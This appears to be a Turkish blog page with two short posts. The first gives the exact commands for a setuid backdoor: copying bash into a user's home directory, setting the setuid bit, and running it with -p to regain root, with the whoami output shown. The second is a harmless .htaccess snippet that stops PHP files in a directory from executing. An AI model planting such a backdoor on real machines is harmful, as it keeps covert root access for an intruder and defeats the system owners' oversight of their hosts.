8 Aralık 2015 Salı

Suid Backdoor

Öncelikle root yetkilerine sahip olmuş olmanız gerekiyor. Nasıl root olacağınız bu yazının dışında kalan bir konu. Biz root olduktan sonrası ile ilgileniyoruz :-)

İlk olarak aşağıdaki komutlarla bash kabuğunun bir kopyasını alalım. Ben kendi ev dizinime kopyalamayı tercih ettim. Daha sonra chmod ile suid olarak ayarlayalım.

mordor ~ # cp /bin/bash ~harun/backdoor
mordor ~ # chmod +s ~harun/backdoor

Artık  suid arkakapımız hazır. Bundan sonra yapmamız gereken -p parametresi ile ev dizinimize aldığımız suid bash kabuğumuzun kopyasını çalıştırmak olacak…

harun@mordor ~ $ whoami
harun
harun@mordor ~ $ ./backdoor -p
harun@mordor ~ # whoami
root

2 Aralık 2015 Çarşamba

Bir Dizin Altındaki PHP Dosyalarının Çalıştırılmasını Engellemek

Web sunucunuzdaki bir dizin ve altındaki dizinlerdeki PHP dosyalarının çalıştırılmadan doğrudan kullanıcıya gönderilmesi için .htaccess dosyası oluşturup içerisinde aşağıdakileri yazmak yeterli olacaktır...

RemoveHandler .php .phtml .php3
RemoveType .php .phtml .php3
php_flag engine off

Bu ayardan sonra PHP kodlarınızın yorumlanmadan kullanıcılara gönderileceğini ve kaynak kodunuzun doğrudan kullanıcılar tarafından görülebileceğini unutmayın...